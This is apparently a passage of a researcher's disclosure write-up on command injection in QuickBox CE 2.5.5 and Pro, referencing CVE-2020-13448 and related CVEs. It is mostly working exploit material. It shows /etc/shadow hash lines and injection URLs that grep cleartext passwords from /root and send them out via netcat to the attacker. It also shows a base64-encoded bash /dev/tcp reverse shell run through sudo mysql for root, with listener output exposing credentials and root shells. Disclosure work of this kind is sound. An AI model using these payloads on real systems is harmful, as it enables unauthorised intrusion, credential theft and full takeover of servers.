    test:$6$qPhsfmxz$Jm529ZLBiigWAhcRO3svLm4HLRFZsYgkWso0dTa2d6Bxb8UJd6LuCI1AVaOutXVheu2Z2iWugRQFQLeZGCecp.:18406:0:99999:7:::
    s1gh2:$6$zaGzrHfj$1Qgs5AWlruq2YJpPFs6TjO2QNtd.WpiAV7WMV9aQE1nJKAC1LdYTh/52/HkvBeYkBhzob/E1q6JwJp6zKGRHx.:18406:0:99999:7:::
    

**Privilege escalation**

Investigating further we found that the cleartext password of every QuickBox CE user is stored in \*.db files in `/root`.  
Since we can run `grep` as root we can dump all admin and non-admin passwords, and exfiltrate the passwords in the same way we did with `/etc/shadow`. This in turn gives us a way to escalate our privileges to that of the admin user. And since the admin user can `sudo su` without a password, we can now gain root access.

To trigger the exploit, setup a netcat listener and visit the following URL:  
`https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+-R+.+/root/+--include="*.info">pwds;nc+<OUR-IP-ADDRESS>+9001<pwds;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 59136
    /root/s1gh2.info:s1gh2 : Password1234 
    /root/s1gh2.info:1GB
    /root/information.info:  Seedbox can be found at https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
    /root/information.info:  If you need to restart rtorrent/irssi, you can type 'reload'
    /root/information.info:  https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
    /root/test.info:test : test 
    /root/test.info:1GB
    /root/s1gh.info:#   https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)

The information.info file will contain the admin user credentials. In this case: `https://_s1gh_:_Password1234_@192.168.1.250 (Also works for FTP:5757/SSH:4747)`

With these credentials we can now ssh into the server and escalate our privileges to the root user.

    s1gh@kali~$: ssh s1gh@192.168.1.250 -p 4747
    s1gh@192.168.1.250's password: 
    Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 5.3.18-3-pve x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
    2 packages can be updated.
    0 updates are security updates.
    
    New release '18.04.4 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.
    
    Last login: Sun May 24 20:53:02 2020 from 192.168.1.126
     Welcome Back !
        * Dashboard:  https://192.168.1.250
        * Support:    https://plaza.quickbox.io
        * Donate:     https://quickbox.io/donate
    
    [s1gh@Ubuntu1604]:(0b)~$ sudo su
    
    
    |========================================================================|
    |------------------------------------------------------------------------|
    |  ###################   This Server is OFF limits   ####################|
    |------------------------------------------------------------------------|
         You are running QuickBox v2.5.5
         Your logged IP is 192.168.1.126:0.0
         Your BASH version is 4.3
         Mon May 25 21:16:30 UTC 2020
    |========================================================================|
    
    
    Ubuntu1604:/home/s1gh# whoami;id
    root
    uid=0(root) gid=0(root) groups=0(root)

**QuickBox Pro**

Due to a partially shared code base between CE and Pro, exactly the same command injection vulnerability can be found in the Pro version.  
The only difference is that `/inc/config.php` no longer exist and part of the source code is encrypted, so we had to manually find the injection point.

After a while we found the injection point in `index.php`.  
The exact same parameters as with the CE version can be abused to achieve RCE.

**Exploit**

By sending a GET request to the following URL: `https://<QUICKBOX-PRO-IP-ADDRESS>/index.php?id=88&servicestart=a;<COMMAND-HERE>;` the command is executed on the server as the www-data user.

**Privilege Escalation**

Since the www-data user can execute `sudo mysql` without a password, we can modify our GET request in such a way that we get a reverse shell as root instantly instead of first getting a shell as the www-data user and then doing the privilege escalation.

Our reverse shell will have a few "bad characters", so first we create a base64 encoded string of the following reverse shell: `bash -i >& /dev/tcp/<YOUR-IP>/<YOUR-PORT> 0>&1`

    s1gh@kali~$: echo -n "sudo mysql -e '\! /bin/bash -c \"bash -i >& /dev/tcp/192.168.1.126/9001 0>&1\"'" | base64
    c3VkbyBteXNxbCAtZSAnXCEgL2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xMjYvOTAwMSAwPiYxIic=

Now that we have the base64 encoded reverse shell, we can visit the following url in order to trigger the exploit (_remember to first setup a netcat listener on your chosen port_):

`https://<QUICKBOX-PRO-IP-ADDRESS>?id=88&servicestart=a;echo+<BASE64-ENCODED-STRING>|base64+-d|bash;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 46862                 
    bash: cannot set terminal process group (135): Inappropriate ioctl for device   
    bash: no job control in this shell                        
    
    
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  ###################   This Server is OFF limits   ####################|                                           
    |------------------------------------------------------------------------|                                           
         You are running QuickBox v2.5.5                      
         Your logged IP is :0.0                               
         Your BASH version is 4.4                             
         Fri May 29 07:30:25 UTC 2020                         
    |========================================================================|                                           
    
    
    
    
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  ###################   This Server is OFF limits   ####################|                                           
    |------------------------------------------------------------------------|                                           
         You are running QuickBox v2.1.8                      
         Your logged IP is :0.0                               
         Your BASH version is 4.4                             
         Fri May 29 07:30:26 UTC 2020                         
    |========================================================================|                                           
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  Just type any one of the following commands                           |                                           
    |  to turn on different bash prompts                                     |                                           
    |------------------------------------------------------------------------|                                           
    |  commandprompt_on                                                      |                                           
    |  this prompt shows last command used & more                            |                                           
    |  powerprompt_on (default)                                              |                                           
    |  this prompt shows colorful system data - cpu, load etc.               |                                           
    |  basicprompt_on                                                        |                                           
    |  this prompt shows color coded load & cpu avg                          |                                           
    |  prompt_OFF                                                            |                                           
    |  this turns off prompts and goes back to default                       |                                           
    |========================================================================|                                           
    
    
    380/2048MB      0.99 1.35 1.60 1/817 6682                 
    [21016:21015 0:37] 07:30:26 Fri May 29 [root@QB-PRO] /srv/quickbox                                                   
    (2:37)# whoami;id                                         
    whoami;id
    root
    uid=0(root) gid=0(root) groups=0(root)

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13448
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13694
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13695
*   https://www.exploit-db.com/exploits/48536
*   https://github.com/s1gh/QuickBox-CE-2.5.5-Authenticated-RCE

Tag

#sql